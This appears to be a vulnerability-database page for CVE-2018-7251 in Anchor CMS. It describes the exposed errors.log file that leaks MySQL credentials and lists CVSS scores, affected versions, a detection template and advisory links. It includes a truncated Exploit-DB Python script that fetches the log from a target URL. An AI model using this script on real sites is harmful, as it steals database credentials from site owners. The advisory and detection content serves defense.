CVE-2018-7251
published 2018-02-19CVE-2018-7251: An issue was discovered in config/error.php in Anchor 0.12.3. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error…
PriorityP273critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
72.27%
99.4th percentile
An issue was discovered in config/error.php in Anchor 0.12.3. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as "Too many connections") has occurred.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| anchorcms | anchor | — | — |
| anchorcms | anchor-cms | >= 0 < 0.12.7 | 0.12.7 |
Detection & IOCsextracted from sources · hover to see the quote
sigma↗
matchers:
- type: word
words:
- '"date":'
- '"message":'
- '"trace":['
condition: and- ·Vulnerability is rooted in config/error.php in Anchor CMS 0.12.3; the log is only populated with credentials if a MySQL error has previously triggered logging ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Anchor CMS Logs Credentials
osv·2022-05-13
CVE-2018-7251 [CRITICAL] Anchor CMS Logs Credentials
Anchor CMS Logs Credentials
An issue was discovered in `config/error.php` in Anchor 0.12.3. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as "Too many connections") has occurred.
GHSA
Anchor CMS Logs Credentials
ghsa·2022-05-13
CVE-2018-7251 [CRITICAL] CWE-200 Anchor CMS Logs Credentials
Anchor CMS Logs Credentials
An issue was discovered in `config/error.php` in Anchor 0.12.3. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as "Too many connections") has occurred.
No detection rules found.
Exploit-DB
AnchorCMS < 0.12.3a - Information Disclosure
exploitdb·2019-10-03·CVSS 9.8
CVE-2018-7251 [CRITICAL] AnchorCMS < 0.12.3a - Information Disclosure
AnchorCMS '.format(__file__))
if __name__ == '__main__':
# Ensure we have the URL
if len(sys.argv) != 2:
print_usage()
sys.exit(1)
print("* Using AnchorCMS website: " + sys.argv[1])
print("* Trying to import 'requests' module")
requests_loader = importlib.util.find_spec('requests')
requests_module_found = requests_loader is not None
if requests_module_found:
import requests
else:
print("* 'requests' module not found, please install it using pip")
print("* pip install requests")
sys.exit(1)
json_url = sys.argv[1].strip("/") + "/anchor/errors.log"
print("* Trying to get errors.log file at: {}".format(json_url))
plain_result = get_plain(json_url)
if plain_result == None:
print("* URL could not be requested, errors.log is probably not exposed")
sys.exit(1)
print("* Found data {}, tryi
Nuclei
Anchor CMS 0.12.3 - Error Log Exposure
nuclei·CVSS 9.8
CVE-2018-7251 [CRITICAL] Anchor CMS 0.12.3 - Error Log Exposure
Anchor CMS 0.12.3 - Error Log Exposure
Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as "Too many connections") has occurred.
Template:
id: CVE-2018-7251
info:
name: Anchor CMS 0.12.3 - Error Log Exposure
author: pdteam
severity: critical
description: |
Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as "Too many connections") has occurred.
impact: |
An attacker can gain access to sensitive information, such as usernames, passwords, and system configuration details.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/154723/Anchor-CMS-0.12.3a-Information-Disclosure.htmlhttp://www.andmp.com/2018/02/advisory-assigned-CVE-2018-7251-in-anchorcms.htmlhttps://github.com/anchorcms/anchor-cms/issues/1247https://github.com/anchorcms/anchor-cms/releases/tag/0.12.7https://twitter.com/finnwea/status/965279233030393856http://packetstormsecurity.com/files/154723/Anchor-CMS-0.12.3a-Information-Disclosure.htmlhttp://www.andmp.com/2018/02/advisory-assigned-CVE-2018-7251-in-anchorcms.htmlhttps://github.com/anchorcms/anchor-cms/issues/1247https://github.com/anchorcms/anchor-cms/releases/tag/0.12.7https://twitter.com/finnwea/status/965279233030393856
2018-02-19
Published